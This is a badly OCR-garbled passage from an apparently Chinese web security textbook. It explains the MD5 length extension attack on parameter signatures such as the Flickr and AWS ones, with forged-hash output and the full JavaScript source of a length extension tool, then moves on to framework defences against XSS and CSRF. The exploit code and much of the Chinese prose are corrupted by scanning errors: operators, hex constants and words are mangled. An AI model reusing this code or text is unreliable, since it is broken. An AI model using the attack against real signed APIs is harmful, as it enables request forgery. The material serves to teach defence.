that is: md5_compression_function(’ 6a674556fdbbladbcd628a9dcd154b53, 'secret's length’, "axis is smart!’ ) 
padding(urlencode format) is: 

MOS 008 008 008008 0090080090080 080080086 00600160018001 001000 09/00900800800800800900900960050080000008 008008008001 


ES CE EXCIDIT 
AUTOR LB f er yer a 


[+] guessing new hash is: clcd3b6bc88292de2f2a3f27 35429933 


[+] now verifying the new hash 
[+] new message (urlencode format) is: 


0, 949967686319T25T88 08008009 008008008008 008008009008 00800/008/008008008008 00800800008 00800/008008008008008 008007 


[+] md5 of the new message is: clcd3b6bc88292de2f2a3£27354e9933 

如 何 利用 Length Extension Attack 

如 何 利 用 Length Extension Attack 呢 ? 我 们 知道 Length Extension 使 得 可 
p eM 附加 任意 值 ， 并 计算 出 新 的 哈 希 。 最 常见 的 地 方 承 是 签 
一 个 合理 的 签名 ， 一 般 需 要 salt 或 者 key 加 上 参数 值 ， 而 salt 或 者 key 都 是 
未 知 的 ， 也 束 使 得 原文 是 未 知 的 。 在 Flickr API 签 名 的 问题 中 ， 
FlickrAPI 同 时 还 犯 了 一 个 错误 ， 这 个 错误 Amazon 的 AWS & 44 也 犯 过 
束 是 在 签名 校 验算 法 中 ， 参 数 连 授时 没有 使 用 间隔 人 符 。 所 以 本 来 

M: 


?a-1&b-2&c-3 


的 参数 ， 在 人 签名 算法 中 连接 时 简单 地 变 成 了 : 


alb2c3 


那么 玫 击 者 可 MEE SU: 
sett AWO Tou 
atm Extension 可 以 生成 一 个 新 的 合法 的 签名 。 这 是 第 一 种 利用 
1A © 
除 此 之 外 ， 因 为 可 以 附加 新 的 参数 ， 所 以 任意 具有 逻辑 功能 ， 但 原文 
中 未 出 现 过 内参 数 都 可 以 附加 ， 比如 : 
这 是 第 二 种 攻击 方式 。 
第 三 种 攻击 方式 : 还 记得 HPP 吗 ? 
附带 相同 的 参数 可 能 在 不 同 的 环境 下 造成 不 同 的 结 采 ， 从 而 产生 一 些 
逻辑 漏洞 。 在 普通 情况 下 ， 可 以 直接 注入 新 参数 ， 但 如 果 服 务 器 端 校 
RIS, 刚 eg Extension 伪 造 一 个 新 的 签名 才 行 。 
最 后 ，Length Extension 需 要 知道 的 leangh， 其 实 是 可 以 考虑 又 力 破解 
的 。 
Length Extension 还 有 什么 利用 方式 ? 尽情 发 挥 你 的 想象 力 吧 。How to 
Fix? 
MD5、SHA-1 之 类 的 使 用 Merkle-Damg?rdhash construction 的 算法 是 没 
KAT o 
使 用 HMAC-SHA1 之 类 的 HMAC 算 法 吧 ， 目 前 HMAC 还 没有 发 现 过 
iile] ° 
男 外 ， 和 针对 Flickr API 等 将 参数 签名 的 应 用 来 说 ，secret 放 置 在 参数 末尾 
也 能 防止 这 种 攻击 。 
比如 MD5(m+secret)， 项 Eie sf ti MDS(m* secret] ipaddingl|m? 结果 由 于 
目 动 附加 se-cret 在 末尾 的 关系 ， 会 变 成 MD5(ml|paddingllm'lsecreb ， 从 
而 导致 Length Extension uf i o 
提供 一 些 参 考 资 料 如 下 : 


http://rdist. NM ae stop- ing- afe-keyed-hashes-use-hmac/ 
http://e i id ine aa org/wiki/SHA-1 

HEPS saben: ut inpr m EKS /space/blo dod ogra ing/HashLengthExtAttack 
HECO: Z/netitera COn/TES ch/flickr_api_sig- e a ry.pdf 
http://en.wikipedia yo i/Merkle-Dai inq LCS 
http://www.ietf.org/rfc/rfci1321.txt 


md5_le.js 源 代码 如 下 : 


md5 length extension - function(m md5, 
m len, append m)( 
var result - new Array(); 
if (m md5.length != 32){ 
alert("input error!"); 
return false; 
} 
// 将 MD5 值 拆 分 成 4 组 ， 每 组 8 个 字 节 
var m = new Array(); 
for (i=0;i<m_md5.length;it=8) { 
m.push(m md5.slice(i,i*8)); 


} 
// 将 MD5 的 4 组 值 还 原 成 压缩 函数 所 需要 的 数值 
var x; 


for(x in m){ 
m[x] = 1tripzero(m[x]); 
// convert string to int ; convert of 
to zerofilled hex() 
m[x] = parseInt(m[x], 16) >> 0; 
// convert of inti128le to hex 
var t-0; 
var ta-0; 
ta - m[x]; 
t - (ta & OxFF); 
ta >>> 8; 
<< 8; 
| (ta & OxFF); 
a = ta >>> 8; 
<< 8; 
| (ta & OxFF); 
= ta >>> 8; 
<< 8; 
| ta; 


[x] = t; 


} 
// 此 时 只 需要 使 用 MD5 压 缩 函数 执行 append m 以 及 append_m 的 padding 即 可 
// 此 时 m 的 压缩 值 已 经 不 再 需要 ， 可 以 用 填充 字 
TRE 
var databytes = new Array(); 
// 初始 化 ， 只 需要 知道 m % 64 的 长 度 即 可 ， 
实 上 可 以 随意 填充 ， 但 我 们 其 实 还 想 知道 padding 
// 如 果 消 息 长 度 大 于 64， 则 需要 构造 之 前 的 等 长 
度 的 消息 ， 用 以 后 面 计算 正确 的 消息 长 度 
if (m_len>64){ 
for (i-0;i«parseInt(m len/64)*64;i-4)( 
databytes.push('97');  // 填充 任意 字 节 
3 


l 
for (i=0;i<(m_len%64) ;i++){ 
databytes.push('97');  // 填充 任意 字 节 


to 
D 
I 


m 


Battattttet 
ete 


x ow 


lli 
dur 


} 

// 调用 padding 

databytes = padding(databytes); 

// 保存 结果 为 padding， 我 们 也 需要 这 个 结果 

result['padding'] = ''; 

for (i=(parseInt(m_len/64)*64 + m_len 
9664); i«databytes.length;i-*)[( 

result['padding'] += 

String.fromCharCode(databytes[i]); 


} 

// 将 append_m 转换 为 数组 添加 

for (j=0;j<append_m. length; j++) { 
databytes.push(append_m.charCodeAt(j)); 


} 

// 计算 新 的 padding 

databytes = padding(databytes); 
var hO = m[0]; 


var hi - m[1]; 
var h2 - m[2]; 
var h3 - m[3]; 


var a=0, b=0, c=0, d=0; 
// Digest message 
// i=n 开始 ， 因 为 从 append_b 开始 压缩 
for (i = parseInt(m_len/64)+1; i < 
databytes.length / 64; i++) { 
// initialize run 


a= ho 
b = hi 
c = h2 
d = h3 


updateRun(fF(b, c, d), 0xd76aa478, 
bytes to int32(databytes, ptr), 7) 
updateRun(fF(b, c, d), 0xe8c7b756, 
bytes to int32(databytes, ptr + 4), 12) 
updateRun(fF(b, c, d), 0x242070db, 
bytes to int32(databytes, ptr + 8), 17) 
updateRun(fF(b, c, d), Oxcibdceee, 
bytes to int32(databytes, ptr + 12), 22) 
updateRun(fF(b, c, d), Oxf57cOfaf, 
bytes to int32(databytes, ptr + 16), 7) 
updateRun(fF(b, c, d), 0x4787c62a, 
bytes to int32(databytes, ptr + 20), 12) 
updateRun(fF(b, c, d), 0xa8304613, 
bytes to int32(databytes, ptr + 24), 17) 
updateRun(fF(b, c, d), Oxfd469501, 


bytes to int32(databytes, ptr + 28), 22 


upd 


bytes to int32(databytes, ptr + 32), 7) 


upd 


bytes to int32(databytes, ptr + 36), 12 


upd 


bytes to int32(databytes, ptr + 40), 17 


upd 


bytes to int32(databytes, ptr + 44), 22 


upd 


bytes to int32(databytes, ptr + 48), 7) 


upd 


bytes to int32(databytes, ptr + 52), 12 


upd 


bytes to int32(databytes, ptr + 56), 17 


upd 


bytes to int32(databytes, ptr + 60), 22 


upd 


a 


a 


a 


a 


a 


a 


a 


a 


a 


teRun(fF(b, c, d), 0x698098d8, 
teRun(fF(b, c, d), Ox8b44f7af, 
teRun(fF(b, c, d), Oxffff5bb1, 
teRun(fF(b, c, d), 0x895cd7be, 
teRun(fF(b, c, d), 0x6b901122, 
teRun(fF(b, c, d), 0xfd987193, 
teRun(fF(b, c, d), 0xa679438e, 


teRun(fF(b, c, d), 0x49b40821, 


teRun(fG(b, c, d), Oxf61e2562, 


bytes to int32(databytes, ptr + 4), 5) 


upd 


a 


teRun(fG(b, c, d), 0xc040b340, 


bytes to int32(databytes, ptr + 24), 9) 


upd 


a 


teRun(fG(b, c, d), 0x265e5a51, 


bytes to int32(databytes, ptr + 44), 14) 


upd 


a 


teRun(fG(b, c, d), Oxe9b6c7aa, 


bytes to int32(databytes, ptr), 20) 


upd 


a 


teRun(fG(b, c, d), Oxde2f105d, 


bytes to int32(databytes, ptr + 20), 5) 


upd 


a 


teRun(fG(b, c, d), 0x2441453, 


bytes to int32(databytes, ptr + 40), 9) 


upd 


bytes to int32(databytes, ptr + 60), 14 


upd 


bytes to int32(databytes, ptr + 16), 20 


upd 


bytes to int32(databytes, ptr + 36), 5) 
bytes to int32(databytes, ptr + 56), 23 


upd 


bytes to int32(databytes, ptr + 4), 4) 


upd 


bytes to int32(databytes, ptr + 16), 11 


upd 


bytes to int32(databytes, ptr + 28), 16 


upd 


bytes to int32(databytes, ptr + 40), 23 


upd 


a 


a 


a 


a 


a 


a 


a 


a 


teRun(fG(b, c, d), 0xd8a1e681, 
teRun(fG(b, c, d), Oxe7d3fbc8, 


teRun(fG(b, c, d), Ox21e1cde6, 


teRun(fH(b, c, d), Oxa4beea44, 
teRun(fH(b, c, d), Ox4bdecfa9, 
teRun(fH(b, c, d), Oxf6bb4b60, 


teRun(fH(b, c, d), Oxbebfbc70, 


teRun(fH(b, c, d), 0x289b7ec6, 


bytes to int32(databytes, ptr + 52), 4) 


upd 


a 


teRun(fH(b, c, d), 0xeaa127fa, 


bytes to int32(databytes, ptr), 11) 


upd 


a 


teRun(fH(b, c, d), Oxd4ef3085, 


bytes to int32(databytes, ptr + 12), 16) 


upd 


a 


teRun(fH(b, c, d), 0x4881d05, 


bytes to int32(databytes, ptr + 24), 23) 


upd 


a 


teRun(fH(b, c, d), 0xd9d4d039, 


bytes to int32(databytes, ptr + 36), 4) 


upd 


a 


teRun(fH(b, c, d), Oxe6db99e5, 


bytes to int32(databytes, ptr + 48), 11) 


upd 


a 


teRun(fH(b, c, d), Ox1fa27cf8, 


bytes to int32(databytes, ptr + 60), 16) 


upd 


a 


teRun(fH(b, c, d), 0xc4ac5665, 


bytes to int32(databytes, ptr + 8), 23) 


upd 


a 


teRun(fI(b, c, d), 0xf4292244, 


bytes to int32(databytes, ptr), 6) 


upd 


a 


teRun(fI(b, c, d), Ox432aff97, 


bytes to int32(databytes, ptr + 28), 10) 


upd 


a 


teRun(fI(b, c, d), 0xab9423a7, 


bytes to int32(databytes, ptr + 56), 15) 


upd 


a 


teRun(fI(b, c, d), Oxfc93a039, 


bytes to int32(databytes, ptr + 20), 21) 


upd 


a 


teRun(fI(b, c, d), 0x655b59c3, 


bytes to int32(databytes, ptr + 48), 6) 


upd 


a 


teRun(fI(b, c, d), Ox8f0ccc92, 


bytes to int32(databytes, ptr + 12), 10) 


upd 


a 


teRun(fI(b, c, d), Oxffeff47d, 


bytes to int32(databytes, ptr + 40), 15) 


upd 


a 


teRun(fI(b, c, d), 0x85845dd1, 


bytes to int32(databytes, ptr + 4), 21) 


upd 


a 


teRun(fI(b, c, d), Ox6fa87e4f, 


bytes to int32(databytes, ptr + 32), 6) 


upd 


bytes to int32(databytes, ptr + 60), 10 


upd 


bytes to int32(databytes, ptr + 24), 15 


upd 


bytes to int32(databytes, ptr + 52), 21 


upd 


bytes to int32(databytes, ptr + 16), 6) 


upd 


bytes to int32(databytes, ptr + 44), 10 


upd 


bytes to int32(databytes, ptr + 8), 15) 


upd 
bytes to 
// 
ho 
hi 
h2 
h3 


a 


a 


a 


a 


a 


a 


a 


tun wold 


teRun(fI(b, c, d), Oxfe2ce6e0, 
teRun(fI(b, c, d), 0xa3014314, 
teRun(fI(b, c, d), 0x4e0811a1, 
teRun(fI(b, c, d), 0xf7537e82, 
teRun(fI(b, c, d), Oxbd3af235, 
teRun(fI(b, c, d), 0Ox2ad7d2bb, 
teRun(fI(b, c, d), Oxeb86d391, 
int32(databytes, ptr + 36), 21 
pdate buffers 

_add(ho, a) 

.add(hi, b) 


.add(h2, c) 
_add(h3, d) 


if (debug -- true)( 
document.write("run times: "+i+"<br/ 
>h3: "+h3+"<br/>h2: "+h2+"<br/>h1: 
"+h1+"<br/>h0: "+h0+"<br/>") 
} 


result['hash'] = int1281e to hex(h3, h2, 
hi, hO); 
return result; 
// 检测 分 组 后 开头 是 否 有 90， 如 果 有 则 去 掉 
function ltripzero(str){ 
if (str.length !- 8) ( 
return false; 


} 

if (str == "00000000"){ 
return str; 

} 

var result = ''; 


if (str.indexOf('0') == 0 ) { 
var tmp - new Array(); 
tmp - str.split(''); 
for (i-0;i«8;i**)( 
if (tmp[i] != 0){ 
for (j=i;j<8;j++){ 
result = result + tmp[j]; 
J 
break; 
} 
} 
return result; 
jelse( 
return str; 


} 


} 
// 往 数组 填充 padding 
function padding(databytes) { 
if (databytes.constructor != Array) { 
return false; 
3 
// save original length 
var org_len = databytes.length 
// first append the "1" + 7x "9" 
databytes.push( 0x80) 
//alert(databytes)  // 添加 第 一 个 0x89， 
然后 填充 gx99 到 56 位 
// determine required amount of padding 
var tail = databytes.length % 64 
// no room for msg length? 
if (tail » 56) ( 
// pad to next 512 bit block 
for (var i = 0; i < (64 - tail); i++) { 
databytes.push(0x0) 
J 


tail = databytes.length % 64 
l 


for (i = 0; i < (56 - tail); i++) { 
databytes.push(0x0) 
3 


// message length in bits mod 512 should 
now be 448 

// append 64 bit, little-endian original 
msg length (in *bits*!) 

databytes - 
databytes.concat(int64 to bytes(org len * 8)) 

return databytes; 


} 
// MD5 压缩 需要 使 用 的 函数 
// function update partial state for each 
run 
function updateRun(nf, sin32, dw32, b32) { 
var temp - d 
d = C 
c-b 
//b = b + rol(a + (nf + (sin32 + 
dw32)), b32) 


b = add(b, 
rol( 
_add(a, 
.add(nf, _add(sin32, dw32)) 
), b32 
) 
) 
a = temp 


} 
function add(ni, n2) { 


return OxOFFFFFFFF & (n1 + n2) 
} 


// convert the 4 32-bit buffers to a 128 
bit hex string. (Little-endian is assumed) 
function int128le_to_hex(a, b, c, d) { 

var ra= "" 

var t = 0 

var ta = 0 

for (var i = 3; i >= 0; i--) { 
ta = arguments[i] 
t = (ta & OxFF) 
ta = ta >>> 8 


t=t<<8 
t =t | (ta & OxFF) 
ta = ta >>> 8 
t=t< 8 
t=t | (ta & OxFF) 
ta = ta >>> 8 
t=t<<8 
t=t | ta 
ra = ra + to_zerofilled_hex(t) 
} 
return ra 


J 
// convert a 64 bit unsigned number to 
array of bytes. Little endian 
function int64 to bytes(num) { 
var retval - [] 
for (var i = 0; i < 8; i++) { 
retval.push(num & OxFF) 
num = num >>> 8 


} 


return retval 


} 
// 32 bit left-rotation 
function rol(num, places) { 
return ((num << places) & OxFFFFFFFF) 
| (num >>> (32 - places)) 


} 
// The 4 MD5 functions 


function fF(b, c, d) { 
return (b & c) | (-b & d) 


} 
function fG(b, c, d) { 
return (d & b) | (~d & c) 


} 
function fH(b, c, d) { 
returnb^c^d 


} 

function fI(b, c, d) { 
return c ^ (b | -d) 

} 


// pick 4 bytes at specified offset. 
Little-endian is assumed 
function bytes_to_int32(arr, off) { 
return (arr[off + 3] << 24) | (arr[off 
+ 2] << 16) | (arr[off + 1] << 8) | 
(arr[off]) 
} 


// convert number to (unsigned) 32 bit 
hex, zero filled string 
function to_zerofilled_hex(n) { 
var ti = (n >>> 0).toString(16) 
return "00000000".substr(0, 8 - 
ti.length) + t1 


} 


第 12 章 ”Web 框架 安全 
前 面 的 章节 ， 我 们 讨论 了 许多 浏览 避 、 服 务 器 端的 安全 问题 ， 这 些 问 
题 都 有 对 应 的 解决 方法 。 总 的 来 说 ， 实 施 安全 方案 ， 要 达到 好 的 效 
果 ， 必 须要 完成 两 个 目标 : 

(1) 安全 方案 正确 、 可 靠 ; 

(2) 能 够 发 现 所 有 可 能 存在 的 安全 问题 ， 不 出 现 遗 漏 。 
只 有 深入 理解 漏洞 原理 之 后 ， 才能 设计 出 真正 有 效 、 能 够 解决 问题 的 
方案 ， 本 书 的 许多 篇 幅 ， 都 是 介绍 漏洞 形成 的 根本 原因 。 比 如 真正 理 
解 了 XSS、SQL 注 入 等 漏洞 的 产生 原理 后 ， 想 彻底 解雇 这 些 闫 疾 并 不 
难 。 人 但是， 方案 光 有 效 是 不 够 的 ， 要 想 设计 出 完美 的 方案 ， 还 需要 解 
决 第 二 件 事 情 ， 就 是 找到 一 个 方法 ， 能 够 让 我 们 快速 有 效 、 不 会 遗漏 
E 。 而 Web 开 发 框架 ， 为 我 们 解决 这 个 问题 提供 了 便 
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在 现代 Web 开 发 中 ， 使 用 MVC 架 构 是 一 种 流行 的 做 法 。MVC 是 Model- 
View-Controller 的 缩写 ， 它 将 Web 应 用 分 为 三 层 ，View 层 负责 用 户 视 
图 、 页 面 展示 等 工作 ;，Controller 负 责 应 用 的 逻辑 实现 ， 接 收 View 层 传 
入 的 用 户 请 求 ， 并 转发 给 对 应 的 Model 做 处 理 ;， Model 层 则 负责 实现 模 
型 ， 完 成 数据 的 处 理 。 


HTTP f 


Request 


Par ameters 


T] HITP «E Resulting 
* Response Data Arrays 
GUI Resulting 
Content Data Arrays 


MVC 框 架 示 意图 

从 数据 的 流入 来 看 ， 用 户 提 交 的 数据 先后 流 经 了 View 层 、Controller、 
Model 层 ， 数 据 的 流出 则 反 过 来 。 在 设计 安全 方案 时 ， 要 牢 牢 把 握 住 数 
RA 在 MVC 框 染 中 ， 通 过 切片 、 过 滤 絮 等 方式 ， 往 往 能 
对 数据 进行 全 局 处 理 ， 这 为 设计 安全 方案 提供 了 极 大 的 便利 。 

比如 在 we Security 中 ， 通 过 URL pattern 实 现 的 访问 控制 ， 需 要 由 框 
架 来 处 理 所 有 用 户 请 求 ， ,在 Spring Security 获 取 了 URL handler 基 础 上 ， 
才 有 可 能 将 后 续 的 安全 检查 落实 。 在 SpringSecurity 的 配置 中 ， 第 一 步 
就 是 在 web.xml 文 件 中 增加 一 个 ter， 接管 用 户 数据 。 


er» 
<filter-name>springSecurityFilterChain</ 
er-name» 


«filter- 
class»org.springframework.web.filter.Delegati 
ngFilterProxy</filter-class> 
</filter> 
<filter -mapping> 

<filter-name>springSecurityFilterChain</ 


filter-name> 
<url-pattern>/*</url-pattern> 
«/filter-mapping» 


然而 数据 的 处 理 是 复杂 的 ， 数 据 经 过 不 同 的 应 用 逻辑 处 理 后 ， 其 内 容 
可 能 会 发 生 改 变 。 比 如 数据 经 过 toLowercase， 会 把 大 写 变 成 小 写 ; 而 
一 些 编码 解码 ， 则 可 能 会 把 GBK 变 成 Unicode 人 码 。 这 些 处 理 都 会 改变 数 
据 的 内 容 ， 因 此 在 设计 安全 方案 时 ， 要 考虑 到 数据 可 能 的 变化 ， 认 真 
其 酌 安全 检查 插入 的 时 机 。 

在 本 书 第 1 章 中 曾经 提 到 ， 一 个 优秀 的 安全 方案 ， 应 该 是 : 在 正确 的 地 
方 ， 做 正确 的 事情 。 

举例 来 说 ， 在 “注入 攻击 ”一 章 中 ， 我 们 并 没有 使 用 PHP 的 
magic_quotes_gpc 作 为 一 项 对 抗 SQL 注入 的 防御 方案 ， 这 是 因为 
magic_quotes_gpc 是 有 缺陷 的 ， 它 并 没有 在 正确 的 地 方 解 决 问题 。 
magic_quotes_gpc 实 际 上 是 调用 了 一 次 addslashes()， 将 一 些 特殊 和 从 号 

(比如 单 引 号 ) 进行 转 义 ， 变 成 了 Vv。 

对 应 到 MVC 架 构 里 ， 它 是 在 View 层 做 这 件 事情 的 ， 而 SQL 注 入 是 Model 
层 需 要 解决 的 问题 ， 结 果 如 何 呢 ?黑客 们 找到 了 多 种 绕 过 
magic quotes gpc 的 办 法 ， 比 如 使 用 GBK 编 码 、 使 用 无 单 引 号 的 注入 


PHP 官 方 在 奉 干 年 后 终于 开始 正视 这 个 问题 ， 于 十 在 官方 文档 的 接 述 中 
不 再 推荐 大 家 使 用 它 : 


Warning 
This feature has been DEPRECATED as of PHP 5.3.0. Relying on this feature is highly discouraged. 


Magic Quotes is a process that automagically escapes incoming data to the PHP script. It's preferred to code with magic quotes off and to instead 
escape the data at runtime, as needed. 


PHP 官 方 声明 取消 Magic Quotes 

所 以 Model 层 的 事情 搞 到 View 层 去 解决 ， 效 果 只 会 适得其反 。 

一 般 来 说 ， 我 们 需要 先 想 清楚 要 解决 什么 问题 ， 深 入 理解 这 些 问 题 
后 ， 再 在 “正确 ”的 地 方 对 数据 进行 安全 检查 。 一 些 主要 的 Web 安 全 威 
胁 ， 如 XSS、CSRF、SQL 注 入 、 访 问 控 制 、 认 证 、URL 跳 转 等 不 涉及 
业务 逻辑 的 安全 问题 ， 都 可 以 集中 放 在 MVC 框 架 中 解决 。 


在 框架 中 实施 安全 方案 ， 比 由 程序 员 在 业务 中 修复 一 个 个 具体 的 bug， 
有 着 更 多 的 优势 。 

首先 ， 有 些 安全 问题 可 以 在 框架 中 统一 解决 ， 能 够 大 大 市 省 程序 员 的 
工作 量 ， 市 约 人 力 成 本 。 当 代码 的 规模 大 到 一 定 程度 时 ， 在 业务 的 压 
力 下 ， 专 门 伦 时 间 去 一 个 个 修补 漏洞 几乎 成 为 不 可 能 完成 的 任务 。 
其 次 ， 对 于 一 些 常见 的 漏洞 来 说 ， 由 程序 员 一 个 个 修补 可 能 会 出 现 遗 
漏 ， 而 在 框架 中 统一 解决 ， 有 可 能 解决 “遗漏 * 的 问题 。 这 需要 制定 相 
天 的 代码 规范 和 工具 配合 。 

最 后 ， 在 每 个 业务 里 修补 安全 漏洞 ， 补 丁 的 标准 难以 统一 ， 而 在 框 杂 
中 集中 实施 的 安全 方案 ， 可 以 使 所 有 基于 框架 开发 的 业务 都 能 受益 ， 
从 安全 方案 的 有 效 性 来 说 ， 更 容易 把 据 。 


12.2 ”模板 引擎 与 XSS 防 御 

在 View 层 ， 可 以 解决 XSS 问 题 。 在 本 书 的 “ 跨 站 脚本 攻击 ”一 章 中 ， 阐 
述 了 “输入 检查 ”与 “输出 编码 ”这 两 种 方法 在 XSS 防 御 效 果 上 的 差异 。 
XSS 攻 击 是 在 用 户 的 浏览 器 上 执行 的 ， 其 形成 过 程 则 是 在 服务 器 端 页 
面 洽 染 时 ， 注 入 了 恶意 的 HTML 代 码 导 致 的 。 从 MVC 架 构 来 说 ， 是 发 
生 在 View 层 ， 因 此 使 用 “输出 编码 ”的 防御 方法 更 加 合理 ， 这 意味 着 需 
要 针对 不 同上 下 文 的 XSS 攻 击 场 景 ， 使 用 不 同 的 编码 方式 。 

在 路 站 并 本 攻击 ” 章 中 ， 我 们 将 “输出 编码 ”的 防御 方法 总 结 为 以 下 


。 在 HTML 标 签 中 输出 变 
。 在 HTML 属 性 中 输出 变 
。 在 script 标 签 中 输出 变量 ，; 
。 在 事件 中 输出 变量 ; 

。 在 CSS 中 输出 变量 ; 

。 在 URL 中 输出 变量 。 


针对 不 同 的 情况 ， 使 用 不 同 的 编码 函数 。 那 么 现在 流行 的 MVC 框 以 是 
否 符合 这 样 的 设计 呢 ? 答案 是 否定 的 。 

在 当前 流行 的 MVC 框 殿中 ，View 层 弟 用 的 技术 是 使 用 模板 引擎 对 页 面 
进行 泻 染 ， 比 如 在 “路 站 脚本 攻击 ”一 章 中 所 提 到 的 Django， 残 使 用 了 
Django Templates 作 为 模板 引擎 。 模 板 引 擎 本 号 ， 可 能 会 提供 一 些 编码 
方法 ， 比 如 ， 在 Django Tem-plates 中 ， 使 用 filters 中 的 escape 作 为 
HtmlEn-code 的 方法 : 


<h1>Hello, (1 namelescape }}!</h1> 


Django Templates 同 时 文 持 auto-escape， 这 符合 Secure by Default 原 则 ° 
现在 的 Django Tem-plates， 默 认 是 将 auto-escape 开 局 的 ， 所 有 的 变量 都 
会 经 过 HtmlEncode 后 输出 。 默 认 是 编码 了 5 个 字符 : 


< is converted to &lt; 


=. 
HÆ; 
Eu 
5E 


>i 

' (single quote) is converte o 

" (double quote) is converte o ot; 
& is converted to &am 


如 果 要 关闭 auto-escape， 则 需要 使 用 以 下 方法 : 


{{ data|safe }} 


或 者 


(96 autoescape off 96) 
Hello {{ name }} 
(96 endautoescape %} 


为 了 方便 ， 很 多 程序 员 可 能 会 选择 关闭 auto-escape。 要 检查 auto-escape 
是 否 被 关闭 也 很 测 单 ， 搜 索 代 人 码 里 是 否 出 现 上 面 两 种 情况 即 可 。 

但 是 正如 前 文 所 述 ， 最 好 的 XSS 防 御 方 案 ， 在 不 同 的 场景 需要 使 用 不 
同 的 编码 函数 ， 如 果 统 一 使 用 这 5 个 字符 的 HtmlEncode， 则 很 可 能 会 
被 攻击 者 绕 过 。 由 此 看 来 ， 这 种 auto-escape 的 方案 ， 看 起 来 也 变 得 不 
那么 美好 了 。 〈 有 具体 XSS 攻 击 的 细节 在 本 书 “ 跨 站 脚本 攻击 ”一 章 中 有 
深入 探讨 ) 

再 看 看 非常 流行 的 模板 引擎 Velocity， 它 也 提供 了 类 似 的 机 制 ， 但 是 有 
所 不 同 的 是 ，Velocity 默 认 是 没有 开局 HtmlEncode 的 。 

在 Velocity 中 ， 可 以 通过 Event Handler 来 进行 HtmlEncode ° 


eventhandler.referenceinsertion.class = 
org.apache.velocity.app.event.implement. 
EscapeHtmlReference 

eventhandler.escape.html.match - /msg.*/ 


使 用 方法 如 下 例 ， 这 里 同时 还 加 入 了 一 个 转 义 SQL 语句 的 Event 
Handler ? 


import 
org.apache.velocity.app.event.EventCartridge; 
impor 
org.apache.velocity.app.event.ReferenceInsert 
ionEventHandler; 

import 
org.apache.velocity.app.event.implement.Escap 
eHtmlReference; 

import 
org.apache.velocity.app.event.implement.Escap 
eSqlReference; 


public class Test 
public void myTest() 
{ 
yee 
* Make a cartridge to hold the event 
handlers 
EventCartridge ec = new EventCartridge(); 
/* 


* then register and chain two escape- 
related handlers 
s 
ec.addEventHandler (new 
EscapeHtmlReference()); 
ec.addEventHandler (new 
EscapeSqlReference()); 
/* 


* and then finally let it attach itself 
to the context 
* 


/ 
ec.attachToContext( context ); 
/* 


* now merge your template with the 
context as you normally 
* do 


“A 


ae 
} 


但 Velocity 提供 的 处 理 机 制 ， 与 Django 的 auto-escape 所 提供 的 机 制 是 类 
似 的 ， 都 只 进行 了 HtmlEncode， 而 未 细 分 编码 使 用 的 具体 场景 。 不 过 


jai ze, FRR SEP, AMEERIKA, DART ANIA 
场景 。 在 Django 中 是 使 用 目 定 义 filters ， 在 Velocity 中 则 可 以 使 
Fi*ZE"(ve-locimacro), LA: 

XML 编码 输出 ， 将 会 执行 XML Encode 输 出 

JS 编 码 输出 ， 将 会 执行 JavaScript Encode 输 出 

通过 自 定 义 的 方法 ， 使 得 XSS 防 御 的 功能 得 到 完善 ， 同 时 在 模板 系统 
中 ， 搜 索 不 安全 的 变量 也 有 了 依据 ， 甚 至 在 代码 检测 工具 中 ， 可 以 目 
Lo ODE PUER 这 在 安全 开发 流程 中 是 非 
党 重要 的 。 

在 其 他 的 模板 引擎 中 ， 也 可 以 依据 “是 否 有 细 分 场景 使 用 不 同 的 编码 方 
式 ” 来 判断 XSS 的 安全 方案 是 否 完整 。 在 很 多 Web 框 架 官 方 文档 中 推荐 
的 用 法 ， 束 是 存在 缺陷 的 。 Web 框 殿 的 开发 着 在 设计 安全 方案 时 ， 有 
时 会 缺乏 来 自 安 全 专家 的 建议 。 所 以 开发 者 在 使 用 框架 时 ， 应 该 慎重 
对 竺 安全 问题 ， 不 可 盲从 官方 指导 文档 。 


12.3 “Web 框架 与 CSRF 防 御 
天 于 CSRF 的 攻击 原理 和 防御 方案 ， 在 本 书 “ 跨 站 点 请 求 伪 造 ” 一 草 中 有 
所 曾 述 。 在 Web 框 架 中 可 以 使 用 security token 解 决 CSRF 攻 击 的 问题 。 
CSRF 攻 击 的 目标 ， 一 般 都 会 产生 * 写 数据 ”操作 的 URL tb 
如 “ 增 ”、“ 删 *、“ 改 ”， 而“ 读 数据” 操作 并 不 是 CSRF 攻 击 的 目标 ， 因 为 
在 CSRF 的 攻击 过 程 中 攻击 者 无 法 获取 到 服务 器 端 返回 的 数据 ， 攻 击 者 
只 是 借用 户 之 手 触 发 服务 器 动作 ， 所 以 读数 据 对 于 CSRF 来 说 并 无 直接 
的 意义 〈 但 是 如 果 同 时 存在 XSS 漏 洞 或 者 其 他 的 跨 域 漏洞 ， 则 可 能 会 
引起 别 的 问题 ， 在 这 里 ， 仅 仅 就 CSREF 对 抗 本 身 进 行 讨论 ) 。 
因此 ， 在 web 应 用 开发 中 ， 有 必要 对 * 读 操作 ”和 “ 写 操作 ”予以 区 分 ， 
比如 要 求 所 有 的 “ 写 操作 ”都 使 用 HTTP POST ° 
在 很 多 讲述 CSRF 防 御 的 文章 中 ， 都 要 求 使 用 HTTP POST 进行 防御 ， 
但 实际 上 POST 本 身 并 不 足以 对 抗 CSRF， 因 为 POST 也 是 可 以 自动 提交 
的 。 但 是 POST 的 使 用 ， 对 于 保护 token 有 着 积极 的 意义 ， 而 security 
token 的 私密 性 (不 可 预测 性 原则 ) ， 是 防御 CSRF 攻 击 的 基础 。 
对 于 Web 框 架 来 说 ， 可 以 自动 地 在 所 有 涉及 POST 的 代码 中 添加 token， 
这 些 地 方 包括 所 有 的 form 表 单 、 所 有 的 Ajax POST 请 求 等 。 
完整 的 CSRF 防 御 方 案 ， 对 于 Web 框 架 来 说 有 以 下 几 处 地 方 需要 改动 。 
(1) 在 Session 中 绑 定 token。 如 果 不 能 保存 到 服务 器 端 Session 中 ， 则 
可 以 替代 为 保存 到 Cookie 里 。 
(2) 在 form 表 单 中 上 自动 填 入 token 字 段 ， 比 如 <input type=hidden 


name="anti_csrf_token"value="$token" /> ° 
(3) 在 Ajax 请 求 中 自动 添加 token， 这 可 能 需要 已 有 的 Ajax 封装 实现 
的 支持 。 


(4) 在 服务 器 端 对 比 POST 提 交 参 数 的 token 与 Session 中 绑 定 的 token 是 
否 一 致 ， 以 验证 CSRF 攻 击 。 
在 Rails 中 ， 要 做 到 这 一 切 非 常 简单 ， 只 需要 在 Application Controller" 
它 将 根据 secret 和 服务 器 端的 随机 因子 目 动 生成 token， 并 目 动 添加 到 
